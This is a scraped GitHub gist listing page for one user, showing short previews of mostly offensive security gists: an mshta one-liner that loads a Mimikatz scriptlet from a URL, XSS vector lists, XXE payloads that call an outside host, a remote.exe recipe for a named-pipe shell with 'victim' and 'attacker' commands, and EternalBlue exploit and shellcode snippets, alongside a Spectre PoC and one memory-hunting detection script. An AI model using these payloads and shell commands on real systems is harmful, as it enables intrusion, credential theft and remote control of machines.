ashr ashr
ashr
/ InterceptorThing.ps1
Created
February 1, 2018 13:16
Interceptor - Normal User No Admin Required.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| .SYNOPSIS | |
| This script demonstrates the ability to capture and tamper with Web sessions. | |
| For secure sessions, this is done by dynamically writing certificates to match the requested domain. | |
| This is only proof-of-concept, and should be used cautiously, to demonstrate the effects of such an attack. | |
| Function: Interceptor | |
| Author: Casey Smith, Twitter: @subTee | |
| License: BSD 3-Clause |
ashr
/ mimikatz.sct
Created
January 19, 2018 11:15
Mimikatz inside mshta.exe - "mshta.exe javascript:a=GetObject("script:http://127.0.0.1:8000/mshta.sct").Exec(); log coffee exit"
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?XML version="1.0"?> | |
| <scriptlet> | |
| <registration | |
| description="Bandit" | |
| progid="Bandit" | |
| version="1.00" | |
| classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}" | |
| > |
ashr
/ spectre.c
Created
January 5, 2018 06:16
— forked from rootkea/spectre.c
PoC from Spectre Attacks: Exploiting Speculative Execution (https://spectreattack.com/spectre.pdf)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <stdint.h> | |
| #ifdef _MSC_VER | |
| #include <intrin.h> /* for rdtscp and clflush */ | |
| #pragma optimize("gt",on) | |
| #else | |
| #include <x86intrin.h> /* for rdtscp and clflush */ | |
| #endif |
ashr
/ syscall_extractor.cpp
Created
December 28, 2017 15:30
— forked from hasherezade/syscall_extractor.cpp
Extracts syscalls list from NTDLL.DLL
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <Windows.h> | |
| // based on: https://www.evilsocket.net/2014/02/11/on-windows-syscall-mechanism-and-syscall-numbers-extraction-methods/ | |
| // author: @evilsocket | |
| // modified by: @hasherezade | |
| #define IS_ADDRESS_BETWEEN( left, right, address ) ( (address) >= (left) && (address) < (right) ) | |
| PIMAGE_SECTION_HEADER SectionByRVA( PIMAGE_SECTION_HEADER pSections, DWORD dwSections, DWORD rva ) | |
| { |
ashr
/ 666_lines_of_XSS_vectors.html
Created
December 1, 2017 10:48
— forked from JohannesHoppe/666_lines_of_XSS_vectors.html
666 lines of XSS vectors, suitable for attacking an API
copied from http://pastebin.com/48WdZR6L
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <script\x20type="text/javascript">javascript:alert(1);</script> | |
| <script\x3Etype="text/javascript">javascript:alert(1);</script> | |
| <script\x0Dtype="text/javascript">javascript:alert(1);</script> | |
| <script\x09type="text/javascript">javascript:alert(1);</script> | |
| <script\x0Ctype="text/javascript">javascript:alert(1);</script> | |
| <script\x2Ftype="text/javascript">javascript:alert(1);</script> | |
| <script\x0Atype="text/javascript">javascript:alert(1);</script> | |
| '`"><\x3Cscript>javascript:alert(1)</script> | |
| '`"><\x00script>javascript:alert(1)</script> | |
| <img src=1 href=1 onerror="javascript:alert(1)"></img> |
ashr
/ gist:60d3389837d11a1a497cdb4f8e89d784
Created
November 7, 2017 07:02
— forked from mattifestation/gist:8ef36782ceb7f73d74cfb00c2a710301
remote.exe - a useful, MS signed SMB shell
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Command to run on the victim | |
| # This will establish a PowerShell listener over the "pwnme" named pipe | |
| remote /S "powershell.exe" pwnme | |
| # Commands to run on an attacker system - if remote.exe is desired on the client (versus developing your own SMB pipe client) | |
| runas /netonly /user:[Domain|Hostname\Username] "cmd" | |
| remote /C [Hostname\IP] "pwnme" |
ashr
/ XXE_payloads
Created
September 13, 2017 11:42
— forked from staaldraad/XXE_payloads
XXE Payloads
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| -------------------------------------------------------------- | |
| Vanilla, used to verify outbound xxe or blind xxe | |
| -------------------------------------------------------------- | |
| <?xml version="1.0" ?> | |
| <!DOCTYPE r [ | |
| <!ELEMENT r ANY > | |
| <!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
| ]> | |
| <r>&sp;</r> |
ashr
/ eternalblue_merge_shellcode.py
Created
June 30, 2017 05:31
— forked from worawit/eternalblue_merge_shellcode.py
Windows x64 and x86 kernel shellcode for eternalblue exploit
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # This file has no update anymore. Please see https://github.com/worawit/MS17-010 | |
| import sys | |
| from struct import pack | |
| if len(sys.argv) < 4: | |
| print('Usage: {} sc_x86 sc_x64 sc_out'.format(sys.argv[0])) | |
| sys.exit() | |
| sc_x86 = open(sys.argv[1], 'rb').read() | |
| sc_x64 = open(sys.argv[2], 'rb').read() |
ashr
/ eternalblue8_exploit.py
Created
June 30, 2017 05:26
— forked from worawit/eternalblue8_exploit.py
Eternalblue exploit for Windows 8/2012
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # This file has no update anymore. Please see https://github.com/worawit/MS17-010 | |
| from impacket import smb, ntlm | |
| from struct import pack | |
| import sys | |
| import socket | |
| ''' | |
| EternalBlue exploit for Windows 8 and 2012 by sleepya | |
| The exploit might FAIL and CRASH a target system (depended on what is overwritten) |
ashr
/ Get-InjectedThread.ps1
Created
June 19, 2017 12:26
— forked from jaredcatkinson/Get-InjectedThread.ps1
Code from "Taking Hunting to the Next Level: Hunting in Memory" presentation at SANS Threat Hunting Summit 2017 by Jared Atkinson and Joe Desimone
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Get-InjectedThread | |
| { | |
| <# | |
| .SYNOPSIS | |
| Looks for threads that were created as a result of code injection. | |
| .DESCRIPTION | |